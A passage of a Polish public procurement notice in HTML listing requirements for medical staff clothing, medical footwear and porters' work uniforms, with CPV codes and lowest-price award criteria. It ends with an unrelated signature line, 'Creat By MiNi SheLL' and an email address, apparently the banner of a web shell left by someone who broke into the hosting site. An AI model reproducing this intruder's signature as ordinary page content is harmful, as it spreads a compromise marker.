1.	Tkanina zastosowana do produkcji powinna umożliwić pranie odzieży w temperaturze min. 90 o C.
2.	 Tkanina zastosowana do produkcji odzieży powinna posiadać odporność na odbarwianie -   tkanina barwiona kadziowo odporna na działanie chloru.
3.	Odzież wymieniona w pakiecie powinna być wykonana z wyjątkową starannością, ściegi krawieckie powinny być proste, ciągłe, nieprzerwane w jednakowej odległości od brzegów tkaniny, obrzucenia powinny być wykonane na maszynach typu Overlock z maszynowym przycięciem zbędnych części materiału. Szwy w miejscach zespoleń różnych części odzieży jak i przy podwinięciach nie powinny powodować ściągania i zmarszczenia tkaniny. 
4.	Napy zastosowane powinny się charakteryzować odpornością na wysoką temperaturę przemysłowych urządzeń do prasowania.
5.	Ubranie lekarza: bluzy z kołnierzykiem lub ze stójką.
6.	Ubranie pielęgniarki, technika, gospodarcze: bluzy  bez kołnierzyka (V) lub inny kształt.
7.	Ubranie rehabilitanta: Podkoszulek/ koszulka polo.
8.	Spodnie na dole lekko zwężone, męskie zapinane na zamek z przodu z kieszeniami wpuszczanymi, damskie zapinane na zamek z przodu bez kieszeni. Spodnie z dodatkową regulacją w pasie gumkami po obu bokach.
9.	Spódnice zapinane na zamek z tyłu z dodatkową regulacją w pasie gumkami po obu bokach.
10.	Pranie - standardowe w przemysłowych pralkach z zastosowaniem środków piorących i dezynfekujących 
11.	Do oferty należy dołączyć katalog z proponowanymi wzorami odzieży minimum po dwa dla każdej pozycji. 
12.	Pod pojęciem wzorów Zamawiający rozumie - dwa komplety lub dwie sztuki odzieży różniące się pomiędzy sobą krojem bluzy, rodzajem kieszeni, kształtem kołnierzyka, sposobem wszycia rękawów, kieszeni. Jako różne wzory nie będą brane pod uwagę te same wzory tylko zaprezentowane z różnymi kolorami dodatków (lamówki, wypustki) lub różniące się fasonem spodni (wąskie, szerokie nogawki), spódnicy (rozkloszowana, zwężana) bez widocznych różnic w kroju bluzy, spodni, lub zaprezentowane w różnych rozmiarach np. S i XXL.
13.	Każdy z wzorów zaznaczonych w katalogu stanowiący alternatywną propozycję dla danej pozycji zostanie wyceniony w jednej cenie przedstawionej w formularzu ofertowym.
14.	Odzież zostanie uszyta zgodnie z wybranym przez Zamawiającego wzorem z wskazanych w katalogu przez Wykonawcę.
(o wartości zamówienia nie przekraczającej kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa obuwia dla personelu medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 2 - Dostawa obuwia dla personelu medycznego:
1.	Buty profilaktyczne męskie, paski
2.	Buty profilaktyczne męskie, kryta cholewka
3.	Buty profilaktyczne damskie, sandały
4.	Buty profilaktyczne damskie, kryta cholewka

Pozostałe wymagania dla Pakietu 2:
1.	Do oferty należy dołączyć katalog z proponowanymi wzorami obuwia. Wykonawca powinien zaproponować (poprzez zaznaczenie w katalogu)  minimum po dwa wzory obuwia do wyboru przez Zamawiającego
2.	Każdy z wzorów zaznaczonych w katalogu stanowiący alternatywną propozycję dla danej pozycji zostanie wyceniony w jednej cenie przedstawionej w formularzu ofertowym.
3.	Obuwie wymienione w pakiecie powinno być wykonane z wyjątkową starannością, ściegi powinny być proste, ciągłe, nieprzerwane w jednakowej odległości od brzegów. Szwy w miejscach zespoleń różnych części obuwia jak i przy podwinięciach nie powinny powodować ściągania i zmarszczenia skóry.
4.	Do produkcji obuwia należy zastosować skóry, materiały i dodatki najlepszej jakości gwarantujące wysoką jakość gotowego wyrobu.
5.	Wymagana pełna rozmiarówka damska (35-42) i męska (40-48).
(o wartości zamówienia nie przekraczającej kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.81.33.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa odzieży i obuwia roboczego (ochronnego), umundurowania i obuwia służbowego portierów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odzieży i obuwia roboczego (ochronnego), umundurowania i obuwia służbowego portierów:
1.	Ubranie robocze nieocieplane drelichowe 
2.	Koszula flanelowa 
3.	Buty - trzewiki robocze nieocieplane dla pracowników gospodarki i magazynierów, męskie
4.	Buty - trzewiki robocze nieocieplane dla magazynierki, damskie
5.	Półbuty czarne dla portiera, zaopatrzeniowca
6.	Trzewiki dla portiera, zaopatrzeniowca
7.	Koszula służbowa długi rękaw
8.	Koszula służbowa krótki rękaw
9.	Kurtka  całosezonowa z bluzą, podpinką do kurtki
10.	Kurtka ocieplana, męska
11.	Kurtka ocieplana, damska
12.	Czapka letnia  
13.	Czapka zimowa 
14.	Ubranie portiera - olimpijka i spodnie 

Pozostałe wymagania dla Pakietu 3:
1.	Odzież wymieniona w pakiecie powinna być wykonana z wyjątkową starannością, ściegi krawieckie powinny być proste, ciągłe, nieprzerwane w jednakowej odległości od brzegów tkaniny, obrzucenia powinny być wykonane na maszynach typu Overlock z maszynowym przycięciem zbędnych części materiału. Szwy w miejscach zespoleń różnych części odzieży jak i przy podwinięciach nie powinny powodować ściągania i zmarszczenia tkaniny. Guziki zastosowane powinny się charakteryzować odpornością na wysoką temperaturę przemysłowych urządzeń do prasowania.
2.	Do produkcji odzieży i obuwia należy zastosować tkaniny, materiały i dodatki najlepszej jakości gwarantujące wysoką jakość gotowego wyrobu.
3.	Oferowana odzież powinna zawierać na metce zalecania temperaturę prania i prasowania.
4.	Odzież dostępna w pełnej rozmiarówce damskiej i męskiej od S do XXL w ramach oferowanej ceny.
5.	Dodatkowo odzież dostępna według indywidualnej miary pracownika Zamawiającego w ramach oferowanej ceny.
6.	Wymagana jest pełna rozmiarówka obuwia, damska (35 - 42) i męska (40 - 48).
(o wartości zamówienia nie przekraczającej kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.33.20.00-5, 18.20.00.00-1, 18.81.23.00-7, 18.81.20.00-4, 18.44.30.00-6, 18.11.00.00-3, 18.83.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com